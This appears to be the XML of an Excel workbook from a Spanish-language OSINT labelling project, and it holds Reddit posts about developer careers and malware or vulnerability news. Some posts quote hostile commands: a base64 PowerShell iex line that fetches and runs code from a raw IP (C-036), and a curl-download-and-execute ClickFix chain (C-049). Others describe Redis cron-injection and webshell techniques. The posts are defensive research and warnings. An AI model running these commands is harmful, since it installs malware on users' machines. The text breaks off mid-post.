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ever\OneDrive\Desktop\tfi-osint-n8n\openspec\changes\reconstruccion-informe-v5\evidencia-muestreo\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{CFE35D77-D2B9-438D-BD89-0C5DFE24ACA8}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-108" yWindow="-108" windowWidth="23256" windowHeight="12456" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="Etiquetado" sheetId="1" r:id="rId1"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">Etiquetado!$A$1:$F$353</definedName>
  </definedNames>
  <calcPr calcId="0"/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1768" uniqueCount="937">
  <si>
    <t>codigo_interno</t>
  </si>
  <si>
    <t>titulo</t>
  </si>
  <si>
    <t>texto</t>
  </si>
  <si>
    <t>comunidad</t>
  </si>
  <si>
    <t>categoria_asignada</t>
  </si>
  <si>
    <t>comentario</t>
  </si>
  <si>
    <t>C-001</t>
  </si>
  <si>
    <t>850+ malicious Google-ad landings used fake ChatGPT pages to install Windows malware</t>
  </si>
  <si>
    <t>Confirmed security research — newly reported October 1–2. Researchers at Island documented a large malvertising operation involving roughly 850 paid-ad landings, 26 lookalike destinations and 71 Google Ads campaign IDs. People searching for ChatGPT could encounter sponsored results that initially led to attacker-created content on the genuine ChatGPT domain before directing them to a supposed “backup” site. The final trap was a fake Cloudflare verification screen using the increasingly common ClickFix technique: victims were instructed to press Win+R and paste a command. Doing so downloaded malware, with researchers observing NetSupport RAT activity capable of remote computer control. Google told Tom's Guide it suspended advertiser accounts associated with the campaign and updated its defenses. This is extremely beginner-relevant because simply checking the initial domain wasn't enough, the attackers abused legitimate hosted content and advertising to establish trust. [link] [comments]</t>
  </si>
  <si>
    <t>r/Malware</t>
  </si>
  <si>
    <t>C-002</t>
  </si>
  <si>
    <t>Trabajar en nubank argentina</t>
  </si>
  <si>
    <t>Hola, alguna experiencia siendo desarrollador ne nubank? [link] [comments]</t>
  </si>
  <si>
    <t>r/devsarg</t>
  </si>
  <si>
    <t>C-003</t>
  </si>
  <si>
    <t>Local Privilege Escalation To System In Wibu-Systems CodeMeter Application</t>
  </si>
  <si>
    <t>[link] [comments]</t>
  </si>
  <si>
    <t>r/netsec</t>
  </si>
  <si>
    <t>C-004</t>
  </si>
  <si>
    <t>¿Cómo es su workflow usando IA para programar?</t>
  </si>
  <si>
    <t>Hola gordos, me interesa saber cómo están trabajando realmente con herramientas como Claude Code, Codex, Cursor, etc. en sus laburos. Más que preguntar qué herramienta usan, me interesa ver el workflow completo de cada uno. Por ejemplo: Si usan agentes o subagentes, si tienen skills propias personalizadas, hooks, manejo de git y hasta qué límite le dan al modelo. Y también otras dudas como por ejemplo: En qué momento dejan que el agente trabaje solo y cuándo intervienen ustedes? Cómo hacen testing, code review y debug? Y si hay algún workflow que hayan armado y que realmente les haya cambiado la forma de trabajar? Si pueden, estaría buenísimo que compartan un ejemplo concreto de cómo encaran una tarea desde que reciben un ticket hasta que hacen el PR/deploy, incluyendo las herramientas, configuraciones o automatizaciones que tengan. La idea es que cada uno pueda mostrar cómo labura y que los demás podamos sacar ideas, probarlas y mejorar nuestro propio workflow. No hace falta que sea un setup súper complejo incluso me interesa ver workflows simples que les funcionen bien. [link] [comments]</t>
  </si>
  <si>
    <t>C-005</t>
  </si>
  <si>
    <t>vCenter pre-auth RCE: CVE-2026-59309/59310</t>
  </si>
  <si>
    <t>CVE-2026-59309 &amp; CVE-2026-59310: patch-diffing VMware vCenter reveals two pre-auth 9.8 bugs - an auth bypass and a syslog path traversal to RCE [link] [comments]</t>
  </si>
  <si>
    <t>C-006</t>
  </si>
  <si>
    <t>Deep-Dive into Android Binder UaF (CVE-2023-20938) using Time-Travel Debugging</t>
  </si>
  <si>
    <t>C-007</t>
  </si>
  <si>
    <t>Playstore adware (maybe malware?) disguised as AAA games</t>
  </si>
  <si>
    <t>I play games on my android often, recently ive noticed more and more games appearing on the store that shouldnt exist and are most likely scams, so i setup a emulator and installed then, i cant pinpoint what exactly is wrong with it besides false advertising, it doesnt request weird permisions or any for that matter, the menus to the "game" appear to just be full of ads that never let you play the "game" and this is the 3rd app ive found this week alone. It feels like google isnt even caring! The app mentioned today is No Mans Sky which is NOT on android, however they have an app listed under early access, 110mb, with screenshots and videos from the real NMS game, once installed the app has a completely different title/package name that the app that is listed on the store. Everything about this screams SCAM but yet google still allowed it to be published. Ive already submitted reports but its been a while and its still up! [link] [comments]</t>
  </si>
  <si>
    <t>C-008</t>
  </si>
  <si>
    <t>Observed fake Claude Code ad / DLL sideloading chain with blockchain C2 (EtherHiding) - IOCs included</t>
  </si>
  <si>
    <t>C-009</t>
  </si>
  <si>
    <t>Termino la carrera?</t>
  </si>
  <si>
    <t>Hola buenas, Tengo 21 años y estudio la Licenciatura en Informática y Desarrollo de Software. Hace un tiempo vengo pensando bastante qué hacer con la carrera y la verdad es que estoy medio dividido. Mi idea a futuro siempre fue tener mi propia empresa. Ahora estoy empezando con proyecto enfocado en digitalización de negocios, desarrollo de software, automatizaciones con IA, páginas web, etc etc eft. El tema es que siento que la facultad está bastante atrasada con respecto a todo lo que está pasando hoy con IA y tecnología. Muchas de las cosas que más me sirven para mis proyectos las termino aprendiendo por mi cuenta, y a veces me pregunto si realmente vale la pena dedicar tantos años y tantas horas a terminar la licenciatura si mi objetivo no es trabajar para una empresa sino trabajar independiente. No digo que la universidad no sirva. Sé que me da bases y también un título que puede servir como respaldo. Pero al mismo tiempo pienso en todas esas horas que podría usar para conseguir clientes, mejorar mi agencia, aprender cosas actuales y ganar experiencia real. Me gustaría escuchar opiniones de gente que haya pasado por algo parecido [link] [comments]</t>
  </si>
  <si>
    <t>C-010</t>
  </si>
  <si>
    <t>Vale la pena un curso de soporte It?</t>
  </si>
  <si>
    <t>Hola gente, vengo a preguntarles si vale la pena pagar el curso de coursera de google it. Estoy buscando contenido en youtube sobre temas que suelen pedir en trabajos de soporte para tratar de evitar pagar por un curso. Los vengo viendo de a poco y a mi tiempo, pero me estoy dando cuenta de que la mayoria de lo que encuentro es bastante teorico y no tienen nada de practica. Algunos de los temas que estoy buscando son CompTIA A+ (que entiendo que es la base de todo), windows server, administracion de microsoft 365 (MS-102), herramientas de tickets, configuracion y administracion de redes, etc. De redes tengo algunos conocimientos porque estoy cursando tercer año de analista en computacion y estamos viendo todas las capas del modelo OSI. En la universidad tenemos practicas de redes, pero esta mas orientado a entender como funcionan las redes que a administrar una red o solucionar problemas concretos. Por la parte de reparar computadoras a nivel hardware no necesito demasiado, porque ya tengo experiencia por mi cuenta. Lo que mas me interesaria es tener practica con cosas como configurar redes, solucionar problemas de red, administrar sistemas, virtualizacion, tickets,etc. Y viendo el curso de google it de coursera,por lo que vi, tiene casi todo de la teoria y tiene practica relacionada con estos temas. La duda que tengo es si realmente vale la pena pagarlo(por que es caro), o si hay otra forma o recurso de practica gratuito. Escucho sus recomendaciones, muchas gracias!! [link] [comments]</t>
  </si>
  <si>
    <t>C-011</t>
  </si>
  <si>
    <t>¿Que andan haciendo desarolladores?</t>
  </si>
  <si>
    <t>Para todos nosotros que llevamos meses sin chamba, y para muchos más de nosotros que hemos abandonado este rubro por el estrés de tan siquiera encontrar trabajo: ¿Qué están haciendo? A los que han seguido en esto por pasión, ¿qué es lo que están estudiando del area IT en una situacion como esta ? En mi opinión, estoy tratando de aprender C. Antes no podía porque sentía que era una pérdida de tiempo estudiar algo que no era tan solicitado por el mercado como Python, Java, etc. Ahora, luego de dejar de buscar chamba en este mundillo de IT, me siento un poco más libre para poder estudiarlo y entender los sistemas a un nivel más bajo. No sé si alguien comparta este mismo sentimiento . [link] [comments]</t>
  </si>
  <si>
    <t>C-012</t>
  </si>
  <si>
    <t>Go implant "SecBox" with AES-256-GCM Dead Drop Resolver and steganographic webshells hiding payloads in PNG pixel data</t>
  </si>
  <si>
    <t>Go implant "SecBox" with AES-256-GCM Dead Drop Resolver and steganographic webshells hiding payloads in PNG pixel data Research on a campaign where a Chinese-speaking operator deployed a Go-based implant framework called SecBox alongside GLUTTON webshells that transport executable bytecode inside PNG images. SecBox connects over TCP, TLS, WebSocket, KCP, or QUIC with Yamux multiplexing. It uses a Dead Drop Resolver that pulls AES-256-GCM encrypted C2 endpoints from Pastebin or GitHub Gist, so the operator can rotate infrastructure without pushing new binaries. Recovered DDR routes included short-lived TryCloudflare domains. The Windows builds fake Microsoft PE metadata (product: "System Configuration Utility", internal name: syscfg.exe). The GLUTTON webshell system is the more interesting part from a delivery perspective. A small server-side loader (JSP, ASPX, ASHX, SOAP, or Razor) accepts a PNG in the request body. It reads pixels row-major, concatenates RGB bytes, XORs with a fixed 16-byte key, and looks for FF 88 00 as the end marker. The result is executable bytecode loaded through a classloader (Java) or Assembly.Load (.NET) directly into memory. The visible server file is just a generic decoder, the actual implant arrives inside image pixels. The campaign also used a fake MySQL server as an initial access vector, returning crafted serialized Java objects when vulnerable clients connected, which triggered second-stage downloads. Full IOC tables and sample hashes: https://hunt.io/blog/chinese-operator-secflow-claude-qwen-deepseek-asia [link] [comments]</t>
  </si>
  <si>
    <t>C-013</t>
  </si>
  <si>
    <t>API de Garmin</t>
  </si>
  <si>
    <t>Hola alguno pudo solicitar la api de Garmin ? es a fin de desarrollo propio, y solo se la brindan a empresas. Gracias [link] [comments]</t>
  </si>
  <si>
    <t>C-014</t>
  </si>
  <si>
    <t>Accenture y Globant. Bootcamps</t>
  </si>
  <si>
    <t>Hola. Una consulta, alguien sabe si Accenture y Globant siguen haciendo sus bootcamps y cada cuanto abren? Muchas gracias. [link] [comments]</t>
  </si>
  <si>
    <t>C-015</t>
  </si>
  <si>
    <t>Granja de Bots para Comentarios</t>
  </si>
  <si>
    <t>Hola Gente. El otro día me llegó una consulta de cuanto cobraría por una granja de bots para comentarios. Obviamente no respondí porque pensé que era estafa pero estaba trabajando en algo similar aunque no usado para eso. Hay demanda de este tipo de sistemas? Es buscado? Pagan bien por esto? Es ilegal? Alguien tiene información del tema o hizo algún proyecto así? Muchas gracias. [link] [comments]</t>
  </si>
  <si>
    <t>C-016</t>
  </si>
  <si>
    <t>I open-sourced a categorized catalog of 2,800+ malware families (Mapped to NIST/CISA &amp; MITRE)</t>
  </si>
  <si>
    <t>Hey everyone, Over the last few months, I've been curating and categorizing a massive catalog of malware families designed specifically for incident responders, SOC analysts, and threat hunters. I got tired of having to scrape together fragmented IOCs and CISA advisories every time a new variant popped up, so I built a centralized, open-source dataset. **What's included:** * **2,800+ Malware Families** categorized by type (Ransomware, InfoStealer, Wiper, etc.) * **Framework Mapping:** Families are mapped to MITRE ATT&amp;CK techniques, NIST CSF guidelines, and official CISA advisories. * **Response Playbooks:** Actionable containment steps and "what to avoid" during an active incident. * **Formats:** Available via a web UI, JSON API, Parquet, and JSONL. It’s completely free and Apache-2.0 licensed. You can br:wse the catalog here: https://jordanricky1604-ship-it.github.io/malware-families-catalog/ Mirror Link: https://malware-families-catalog.systemhelpdesk.com/ I'd love to hear your feedback on the schema or if there are specific families you think need deeper analysis. I'm actively maintaining and updating this! [link] [comments]</t>
  </si>
  <si>
    <t>C-017</t>
  </si>
  <si>
    <t>RCE in OpenCode (GHSA-632h-h47v-g4x4)</t>
  </si>
  <si>
    <t>C-018</t>
  </si>
  <si>
    <t>PSA: Fake Web3 “job assessment” repos can hide malware in .git/hooks — check before you commit - HACK</t>
  </si>
  <si>
    <t>C-019</t>
  </si>
  <si>
    <t>Attempted Malware infection on a job listing</t>
  </si>
  <si>
    <t>Hi, not sure if this is the best place to discuss but I recently was applying for software dev jobs and one "company" sent me a repo, with the task being to add a certain feature, however before running the code I scanned it for malware, which came up positive. It seems like running it would send out a request that could return with external code from the attacker that would run and quite likely give remote access. I'm basically just looking for advice about where I should report this, the company itself, and wondered if there was any recourse? [link] [comments]</t>
  </si>
  <si>
    <t>C-020</t>
  </si>
  <si>
    <t>Opinion de EducacionIT</t>
  </si>
  <si>
    <t>Buenas, gente, una consulta súper rápida. ¿Han tomado algún curso en la plataforma que mencioné? En caso de que sí, ¿qué tal fue su experiencia? Quiero tomar uno que me interesa, pero tengo mis dudas sobre si es bueno. Tendré en cuenta todas las opiniones; me ayudaría mucho. Gracias. [link] [comments]</t>
  </si>
  <si>
    <t>C-021</t>
  </si>
  <si>
    <t>Loupe: An Android Console in the Browser</t>
  </si>
  <si>
    <t>C-022</t>
  </si>
  <si>
    <t>CISA: WatchGuard RCE flaw now exploited in ransomware attacks</t>
  </si>
  <si>
    <t>CISA has confirmed that ransomware operators are exploiting CVE-2025-14733, a critical remote-code-execution vulnerability affecting WatchGuard Firebox appliances. The bug can allow an unauthenticated attacker to execute code remotely under vulnerable configurations. [link] [comments]</t>
  </si>
  <si>
    <t>C-023</t>
  </si>
  <si>
    <t>Telegram Desktop vulnerability allowed any user file to be stolen</t>
  </si>
  <si>
    <t>C-024</t>
  </si>
  <si>
    <t>Unit 42 Uncovers PEERSTITCH, a Stealthy FortiGate Implant</t>
  </si>
  <si>
    <t>Researchers at Palo Alto Networks Unit 42 published an investigation into a sophisticated attack against a telecommunications provider. The original intrusion occurred in September 2024, but the newly published analysis documents previously unreported malware. Attackers initially exploited CVE-2024-47575 to compromise a FortiManager management appliance. They obtained configuration files and sensitive information associated with more than 500 FortiGate firewalls. The attackers subsequently deployed malware called PEERSTITCH. Its unusual feature is that it operates inside the memory of legitimate firewall processes rather than maintaining a conventional malware file on disk. The implant could manipulate VPN security checks while blending into normal network activity. The researchers did not establish that all 500 managed firewalls were compromised. This is an excellent example of why traditional antivirus scanning cannot detect every attack. Malware operating in memory may leave fewer conventional file-based indicators. [link] [comments]</t>
  </si>
  <si>
    <t>C-025</t>
  </si>
  <si>
    <t>Leveraging undocumented CodeConnection APIs in a CodePipeline build job or SageMaker Studio Notebook to enumerate, clone, push and delete code repositories.</t>
  </si>
  <si>
    <t>Continuing my spare time research around CodeConnections, I've moved on from CodeBuild and started looking at CodePipeline &amp; SageMaker. In this post I cover how to use undocumented CodeConnection APIs from within CodePipeline build jobs to extend access to more repositories and privileges and show why it is very important to ensure that the IAM role used with CodePipeline has restricted CodeConnection permissions. In the follow up post I also show how SageMaker Studio Notebooks uses the same CodeConnection infrastructure as CodePipeline so has the same privilege escalation issues. [link] [comments]</t>
  </si>
  <si>
    <t>C-026</t>
  </si>
  <si>
    <t>Por qué le pusieron así 🤔😩</t>
  </si>
  <si>
    <t>C-027</t>
  </si>
  <si>
    <t>Leaked GitHub App private keys let researchers impersonate 440 apps including CDC and BuildBuddy</t>
  </si>
  <si>
    <t>C-028</t>
  </si>
  <si>
    <t>Ingeniería en Sistemas de Información, ¿es ingeniería?</t>
  </si>
  <si>
    <t>Recuerdo que un profesor en primer año, creo el de física, nos mencionó que éramos ingeniería porque teníamos física 1 y 2 en el programa que son la base de cualquier ingeniería a pesar que no tengamos que poner nuestra firma en trabajos como por ejemplo en Civil que ahí se juegan el pellejo porque si erran en cálculos muere gente mientras que en sistemas no. Disculpen si el flair no es correcto pero creo que es una discusión válida. [link] [comments]</t>
  </si>
  <si>
    <t>C-029</t>
  </si>
  <si>
    <t>Featured Chrome extension "Planet Search" (2M installs) routes every query to the nextgeeker[.]com hijacker network</t>
  </si>
  <si>
    <t>While analyzing featured extensions on our beloved chrome web store I landed on Planet Search (`kadaohckdkghfaclhjmkmplebcdcnfnp`), Featured, 2M users, publisher **FREE VPN PLANET SRL**. **The extensions has a 0-byte background.js with zero permissions.** The whole mechanism is one `chrome_settings_overrides` search provider, so nothing shows up statically. It's all server-side. Declared provider is `planet-search[.]com`. Tracing: planet-search\[.\]com/search/?q= 301 → sstmaster\[.\]com/edge/PN1021?q= 302 → nextgeeker\[.\]com/B151001.php?q=&amp;src=PN1021 `nextgeeker[.]com` is flagged as a browser hijacker by multiple vendors (pcrisk, gridinsoft, others). `PN1021` is the affiliate subid linking the extension's traffic to that network. The listing discloses none of the hops and says only that results come from Google (the final page is a Google CSE render). Same publisher ships a \~1M-user VPN extension and a few others. Still tracing those, not going to characterize them until I have. Report: [https://malext.io/reports/RoguePlanet/\](https://malext.io/reports/RoguePlanet/) [link] [comments]</t>
  </si>
  <si>
    <t>C-030</t>
  </si>
  <si>
    <t>Uso y recomiendo: rehusarse a hacer take-home tests</t>
  </si>
  <si>
    <t>Quién no ha pasado 2 o más horas poniendo empeño en un TP; que generalmente son genéricos y repetibles, la típica virgin poke api, para que luego quizás no te seleccionen o te ghosteen? Yo era uno de ellos. Y me hinche los huevos. Hay que creérsela un poco más. Tenés años de experiencia en tu CV, contando detalladamente los distintos problemas y soluciones implementados. Te vas a poner a hacer un challenge de mierda un domingo a la noche? Hay que hacerse valorar. Lo que hice fue algo a lo que aposté, y me terminó funcionando: un par de apps full stack, realísticas y no un to-do list, hechas bien al detalle y abarcando desde SDD hasta tests. Dockerizadas. En momentos donde tuve entrevistas, siempre me va bien con RR.HH. y cuando me anuncian que la segunda instancia es un take-home, ahí me paro y explico que tengo en mi Github proyectos públicos completos, que abarcan lo que solicitan y más aún. Hasta ahora tuve todo tipo de respuestas, pero a mi modo de ver el saldo es positivo hacia mi favor. Algunos dicen que no (y yo decido no avanzar), otros lo aceptan y luego de que lo revisan paso a la siguiente instancia donde lo reviso junto a un técnico, que generalmente tiene mejor predisposición ya que no le está viendo la 10ma pokeapi de la semana, sino algo realista que le puede hacer entender como me manejaría en un contexto real. Es arriesgado, pero si vas a la cantidad salis ganando, con menos esfuerzo. [link] [comments]</t>
  </si>
  <si>
    <t>C-031</t>
  </si>
  <si>
    <t>¿Por qué nadie puede dejar Nvidia?</t>
  </si>
  <si>
    <t>C-032</t>
  </si>
  <si>
    <t>DTF JPMorgan. A alguno lo contactaron?</t>
  </si>
  <si>
    <t>Hola. A alguien lo contactaron después del vídeo en inglés, para DTF de JPMorgan? Creo que arranca en un mes y quería saber si a alguien ya lo contactaron. O saben masomenos en qué fechas contactan o con cuanto tiempo de anticipación? Habían dicho que era en noviembre pero no sé si paso algo. Muchas gracias. [link] [comments]</t>
  </si>
  <si>
    <t>C-033</t>
  </si>
  <si>
    <t>Azure's Weakest Link - Five Full Cross-Tenant Compromises</t>
  </si>
  <si>
    <t>API Connections allow anyone to fully compromise any other connection worldwide, giving full access to the connected backend. [link] [comments]</t>
  </si>
  <si>
    <t>C-034</t>
  </si>
  <si>
    <t>Entrevista tecnica en 2026?</t>
  </si>
  <si>
    <t>Buenas, estoy buscando laburo y un amigo me conto que en bairesdev le hicieron una entrevista tecnica, le hicieron preguntas y respuestas de cosas muy tenicas, y despues lo pusieron a programar en vivo esto es asi en todas partes? me parece que va esto en pleno 2026 y con años experiencia encima te pidan estas cosas ... [link] [comments]</t>
  </si>
  <si>
    <t>C-035</t>
  </si>
  <si>
    <t>SpectrePaste: TA leveraged AI for entire orchestration and development of their malware ecosystem</t>
  </si>
  <si>
    <t>C-036</t>
  </si>
  <si>
    <t>iex scripts are in fashion now</t>
  </si>
  <si>
    <t>they are getting smarter this is what the script copied to my clipboard. funny that this website was opened for the first time, yet chrome gave it clipboard permission. lol iex([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgJ2h0dHA6Ly8xNjYuMS44OS45MS9fLycgLVVzZUJhc2ljUGFyc2luZyB8IEludm9rZS1FeHByZXNzaW9u'))) [link] [comments]</t>
  </si>
  <si>
    <t>C-037</t>
  </si>
  <si>
    <t>Año sabático: visa a australia</t>
  </si>
  <si>
    <t>Buenas ! Contexto, gordo pc toda mi vida. Hace 6 años que arranqué mi carrera, 5 años que estoy trabajando y soy analista de software recibido. Tengo 25 años (arranqué ing en sistemas a los 18 años, a laburar a los 19). La cuestión es que tengo el dilema de si sacar una working holiday para Australia y dejar obviamente la comodidad de mi laburo remoto por un año q me pintó la loca. A mi me gusta la tecnología, el trabajo me gusta si dentro de todo, pero me come la cabeza pensar q voy a estar el resto de mi vida en la pc sentado con problemas cervicales durante el resto de mi existencia. Actualmente, gracias a este laburo puedo estar fuera del país actualmente que lo veo increíble y provechoso... más allá de comerme el pijaso de laburar en uso horario Argentino, gano el equivalente a 2500 USD. Trabajé en 2 empresas, la primera era un ERP con tecnologías legacy: Oracle Forms, Oracle Reports, APEX y PL/SQL. Aprendí una WASADA en esa empresa, era programación + devops + soporte tanto para el uso de la plataforma como para trabajo administrativo del cliente. Gracias a eso, era tan pesado que renuncié, a los meses agarré mi actual que estoy hacia 3 años y chirola, ahora laburo como full-stack manteniendo un producto multitenant con react, python y AWS . Me encargo del 90% de los servicios de esa plataforma, que la usan 20 empresas. Mi nivel de inglés es B2 tratando de perfeccionar para C1 que voy a nivelar con IELTS en unos meses... me estoy preparando. Mi dilema es con la carrera q tengo, que me gusta por supuesto, si dejar todo a la pija e irme a vivir un añito otra cosa... después creo que volvería y seguiría con esto porque se que es lo que me gusta y creo que lo mejor que me sale. Obvio que esto también nace porque medio que estoy un poco hasta la pija del laburo actual, no por lo pesado si no porque misma gente, mismo proyecto, etc. El tema es que no paro de decir y si no lo hago ? Que me pierdo ? jaja . Aprovecharía ese año para hacer cosas nada q ver a IT y q sea mas creación de contenido y ese tipo de cosas, lo unico que voy a estar metiendo es LinkedIn y plataformas para vender / posicionar mi perfil para cuando retome si es que retomo (que de hecho, considero que tengo muy buen perfil en LinkedIn). Se que después volver va a ser complicado, sobretodo por el hecho de que esta durísima la calle, si ya en el 2023 me costo 9 meses volver a trabajar no me quiero imaginar ahora. Hice aprox 20 procesos de entrevistas pero hinchando las bolas, no tomándomelo tan en serio y bueno se por carne propia que la parte técnica de las entrevistas son jodidas y hasta hacen preguntas específicas de frameworks q ni ellos saben o la estudiaron 10 minutos antes. Que dicen ? Los leo gordos [link] [comments]</t>
  </si>
  <si>
    <t>C-038</t>
  </si>
  <si>
    <t>PATCHCORD: New malware cluster targets Afghan telecom and South Asian critical infrastructure</t>
  </si>
  <si>
    <t>Acronis Threat Research Unit (TRU) has identified an ongoing campaign delivering a previously undocumented custom backdoor against Afghan telecom providers and South Asian critical infrastructure organizations. The backdoor, tracked as PATCHCORD, is a compiled C/C++ implant delivered through sector-specific lures, including fake VPN installers impersonating Afghan Telecom (AFTEL) and telecom management tools. The research is published here - https://www.acronis.com/en/tru/posts/patchcord-new-malware-cluster-targets-afghan-telecom-and-south-asian-critical-infrastructure/ [link] [comments]</t>
  </si>
  <si>
    <t>C-039</t>
  </si>
  <si>
    <t>GeoNetwork - Pre-Auth RCE via Unauthenticated File Upload and Unsafe XSLT Processor (4 CVEs, 121 government deployments, all patched)</t>
  </si>
  <si>
    <t>C-040</t>
  </si>
  <si>
    <t>Lance la segunda versión de mi framework de CSS: Puppertino</t>
  </si>
  <si>
    <t>Hola gente! Hace como 5 años había creado un framework de CSS basado en los Human Interface Guidelines de Apple para macOS y iOS, y este último año lo monté desde 0 para macOS y iOS 27. Puppertino busca traer a la web todos los componentes de la Mac y el iPhone a la web para poder construir apps web que se sientan más nativas al propio sistema operativo. También tiene soporte para temas, colores, materiales y es accesible para opciones de transparencia, animaciones y contraste. Denle una mirada y me cuentan que tal:D https://puppertino.com/ [link] [comments]</t>
  </si>
  <si>
    <t>C-041</t>
  </si>
  <si>
    <t>Building A Malware Lab From Scratch!</t>
  </si>
  <si>
    <t>https://youtu.be/1W8gCFU8B0U Thought it would be fun to share some learnings I made when building a similar lab at work but for me. Not exactly what I built at work (I think mines a bit better TBH) but this first video could be a jumping off point for different ways to do this 😄 Open to suggestions and feedback ❤️ Edit: I've fixed the audio so it should be better now! [link] [comments]</t>
  </si>
  <si>
    <t>C-042</t>
  </si>
  <si>
    <t>Algo inusual en una entrevista.</t>
  </si>
  <si>
    <t>Supongo que todos hemos pasado (más de una vez) por esto: Tenemos una entrevista, todo parece ir bien, pero luego te dicen que no van a continuar, y te mandan algún feedback. Pero el feedback no condice con lo que ocurrió en la entrevista, o inventan que dijiste cosas que no dijiste, o que dijiste cosas distintas de lo que realmente dijiste. Seguramente respondemos que no fue así, pero todo queda ahí. Hace unas semanas, me contacta un recruiter por LinkedIn para un puesto de Lead Engineer para una startup. Yo no estaba buscando, pero como ahora trabajo para un banco gigante y si bien es buena plata, el laburo en sí es un bodrio, y lo que ofrecían en la startup era mucho más interesante, y además más plata. Así que acepté iniciar el proceso. Tengo una entrevista por Google Meet con el COO de la empresa, le cuento lo que estuve haciendo en mis dos últimos trabajos, me cuenta lo que hacen en la empresa y todo eso, nada raro, entrevista standard. Al día siguiente el recruiter me manda un mail diciéndome que era un "no", y me pasa dos frases de feedback; las dos incorrectas, malinterpretando lo que había dicho. Le respondo que eso estaba mal y le explico qué era lo incorrecto. Al día siguiente me llama y me dice que ok, que seguíamos adelante con el proceso. Tuve una siguiente entrevista técnica con dos developers, que también pasé, y por último una con el COO otra vez y también con el CEO, medio técnica, medio general. Y ayer me confirman que me ofrecen el puesto, que acepté, y empiezo en noviembre. A alguien le pasó algo así, que se hayan quejado que el feedback no coincidía con lo que habían dicho en la entrevista, que les hayan dado la razón y hayan continuado el proceso? A mí nunca me había pasado y me pareció raro, pero lo veo como algo positivo que sea alguien que reconozca que se equivocó y lo corrija. TL;DR: Me quejé porque el feedback que recibí de la primera entrevista no era lo que yo había dicho, se retractaron, seguimos con el proceso y terminaron ofreciéndome el puesto. [link] [comments]</t>
  </si>
  <si>
    <t>C-043</t>
  </si>
  <si>
    <t>Deep structural file analysis with MITRE ATT&amp;CK mapping, from the original ClamAV authors (clens.io)</t>
  </si>
  <si>
    <t>C-044</t>
  </si>
  <si>
    <t>Egresados de Ciencia de Datos de UNICABA: qué posgrados pudieron hacer?</t>
  </si>
  <si>
    <t>C-045</t>
  </si>
  <si>
    <t>alguien implemento hubspot smart crm o es pura promesa comercial sobre la limpieza de datos?</t>
  </si>
  <si>
    <t>en la empresa donde laburo el area comercial quiere que integremos sus flujos con hubspot smart crm para terminar con los registros duplicados y la falta de datos en el embudo. la promesa que les vendieron es que la plataforma enriquece los contactos sola y mantiene las actividades sincronizadas sin intervencion humana, pero cada vez que el equipo de ventas pide este tipo de soluciones el bardo de integracion y soporte nos cae a nosotros. me preocupa que las supuestas funciones de deduplicacion inteligente terminen sobreescribiendo campos criticos o requieran que estemos parcheando webhooks y scripts a mano cada dos semanas. para los que hayan tenido que conectar o mantener esta infraestructura: el enriquecimiento y el orden de la base realmente funcionan como dicen, o termina siendo un dolor de cabeza a nivel sincronizacion y permisos? [link] [comments]</t>
  </si>
  <si>
    <t>C-046</t>
  </si>
  <si>
    <t>a CVE dispute</t>
  </si>
  <si>
    <t>C-047</t>
  </si>
  <si>
    <t>🔴 Redis cryptomining toolkit recovered from an open directory: XMRig deployment, fileless loader, chr()-encoded WordPress scripts</t>
  </si>
  <si>
    <t>Researchers pulled 147 files off an open directory that was the operator's live working folder: Python exploit source, campaign logs, a bundled Python 3.11, and two exported Windows registry hives (SAM.save, SYSTEM.save, verified by the regf header). Worth a look: Main technique abuses replication, not a bug. CONFIG SET dir/dbfilename, SLAVEOF to a rogue master, serve a crafted RDB on +FULLRESYNC. Blob opens with the REDIS0009 magic, then one key/value pair with an embedded newline before the cron text so the payload lands on its own line. Then SLAVEOF NO ONE and restore. No client library. PING/CONFIG SET/SLAVEOF hand-serialized to raw RESP, length-aware reader, same two functions copied across every script. Fileless loader is one line in _boot.py that base64-decodes and exec()s an orchestrator in-process. Generous naming though, it writes the decoded target list and deployer back to disk as plaintext, so only the first stage stays off disk. chr()-encoded literals in the WordPress scripts (chr(97)+chr(100)+... for "admin"), defeats naive keyword matching, control flow stays readable. Three generations of verify payloads with bugfix comments left in. Two real bugs documented: a test cron written to a dotfile that run-parts silently skips, and a /dev/tcp payload that fails under dash. Newest XMRig variant adds --tls-fingerprint pinning the pool cert, absent from earlier gens. SSH-via-AOF and a Lua EVAL sandbox probe are also in the kit, neither produced a confirmed compromise. Full write-up with IOCs and code: https://hunt.io/blog/redis-cryptomining-botnet-3562-servers [link] [comments]</t>
  </si>
  <si>
    <t>C-048</t>
  </si>
  <si>
    <t>Qué tal es la empresa DEPT?</t>
  </si>
  <si>
    <t>Buenas gente. Me ofrecieron un lugar en esta empresa y actualmente estoy en otra multinacional. Les consulto que onda porque me interesa la propuesta pero estoy indeciso. [link] [comments]</t>
  </si>
  <si>
    <t>C-049</t>
  </si>
  <si>
    <t>I've been telling people to check the wrong thing first, and ClickFix is why</t>
  </si>
  <si>
    <t xml:space="preserve">I've written binary triage guides for Windows and macOS, and both of them have you checking where a file came from fairly early on. Against the delivery method that keeps turning up on this sub, that's the one check guaranteed to come back empty, and empty reads as reassuring when it shouldn't. Took me embarrassingly long to spot, so here's the whole thing. What made me look These macOS ClickFix chains all have roughly the same shape. This one's the second stage from u/glazypig's writeup of the fake Apple support page. curl -o /tmp/helper hxxps://cedar-satin[.]com/[path]/cleaner3/update &amp;&amp; xattr -c /tmp/helper &amp;&amp; chmod +x /tmp/helper &amp;&amp; /tmp/helper The xattr -c is what caught me. There's no quarantine attribute there to clear. The curl -o that made the file is sitting in the same command line, so the download path that would have set one was never involved. Quarantine is applied by the downloader, not by the OS This is the bit I'd never properly thought through. com.apple.quarantine isn't set by the kernel or the filesystem when bytes hit disk. It's set by whatever application did the downloading, which opts in with LSFileQuarantineEnabled in its Info.plist. Browsers set it, so do Mail, Messages and AirDrop. curl doesn't, because it's a command line tool that never touches the LaunchServices API. A file it fetches from a 